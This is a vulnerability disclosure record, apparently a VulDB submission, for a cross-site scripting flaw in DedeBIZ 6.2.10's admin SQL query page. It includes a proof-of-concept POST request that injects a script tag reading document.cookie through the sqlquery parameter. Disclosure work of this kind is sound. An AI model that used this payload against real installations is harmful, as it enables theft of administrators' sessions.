| Title | XSS vulnerability exists in DedeBIZ v6.2.10 |
|---|
| Description | [Suggested description]
DedeBIZ v6.2.10 was discovered to contain an XSS vulnerability in /admin/sys_sql_query.php.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
https://www.dedebiz.com/
[Affected Product Code Base]
DedeBIZ 6.2.10
[Affected Component]
admin/sys_sql_query.php
POST /admin/sys_sql_query.php HTTP/1.1
..............
dopost=query&_csrf_token=cefb8cd300e4ef8c92a9334d18640faf&querytype=2&sqlquery=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
[Attack Type]
Remote
[Vulnerability demonstration]
https://github.com/TXPH/CVE/blob/main/xss-report.pdf
[Repair suggestions]
Filter the output SQL statement content.
|

| Field | Value |
|---|---|
| Source | ⚠️ https://github.com/TXPH/CVE/blob/main/xss-report.pdf |
| User | TXPH (UID 50296) |
| Submission | 07/13/2023 10:10 (3 years ago) |
| Moderation | 07/22/2023 08:09 (9 days later) |
| Status | Accepted |
| VulDB entry | 235188 [DedeBIZ 6.2.10 /admin/sys_sql_query.php cross site scripting] |
| Points | 20 |